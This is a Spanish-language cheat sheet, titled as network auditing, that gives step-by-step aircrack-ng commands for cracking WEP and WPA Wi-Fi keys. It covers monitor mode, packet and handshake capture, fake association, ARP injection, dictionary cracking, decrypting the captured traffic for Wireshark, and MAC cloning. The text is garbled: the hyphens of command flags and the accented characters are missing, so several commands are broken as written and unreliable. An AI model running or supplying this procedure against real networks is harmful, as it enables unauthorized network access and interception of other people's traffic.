AUDITORIA DE REDES: WEP

Cambiar orden de booteo (Bootear con DVD): Start Backtrack in text mode lspci (Lista los chips de las tarjetas conectadas) ctrl + alt + f2 (consola) iwconfig muestra las tarjetas que estn instaladas) startx (consola grafica) Abrir Shell: 1) Iniciar la tarjeta en modo monitor: airmon-ng start wlan0 2) Reconocer el entorno inalmbrico: airodump-ng wlan0 (Muestra las redes) (Parar un proceso con Ctrl + C) 3) Capturar paquetes de datos: Nueva Shell: Airodump-ng c canal b mac_ap w nombre_archivo wlan0 4) Asociacin falsa (cuando no hay clientes) aireplay-ng -1 0 w SSID del AP A Mac del AP H Mac falsa wlan0 5) Inyeccin de trfico: Nueva Shell: aireplay-ng -3 b Mac AP h Mac del Cliente wlan0 x 300

64b

10 caracteres 40000

128b 26 caracteres 100000 152b 32 caracteres 150000 ASCII: 5, 13 y 16 caracteres ______________________________________________________________________

6) Encriptar la clave: aircrack-ng ruta del archivo (Arrastrar del lugar donde est ubicado el archivo *.cap) 7) Decodificar los paquetes: airdecap-ng w clave encontrada anteriormente ruta completa de archivo Nota que se genera un nuevo archivo captura-01-dec.cap (descifrada) 8) Analizar el trafico capturado: wireshark ruta del nuevo archivo Filter: DNS Reboot Poweroff (apagar)

Luego autentificar en el sistema operativo. Tener en cuenta que si la red es abierta o compartida. ndice de clave avanzado Cambiar mac (clonar)

AUDITORIA DE REDES PARTE II: WPA

Tener diccionarios *.txt start Bactrack in text mode 1) Configurar tarjeta modo monitor airodump-ng start wlan0 2) Reconocer el entorno inalmbrico airodump-ng wlan0 t WPA 3) Capturar paquete de datos: Handshake airodump-ng c canal b mac_AP -w nombre_archivo wlan0 4) Asociacin falsa usuario cliente: Tiene que existir un cliente

aireplay-ng -1 0 e SSID a MAC_AP h Mac_Cliente wlan0 5) Busca la clave: aircrack-ng w ruta_del_archivo b Mac_Ap ruta del hankshake

Luego clonar MAC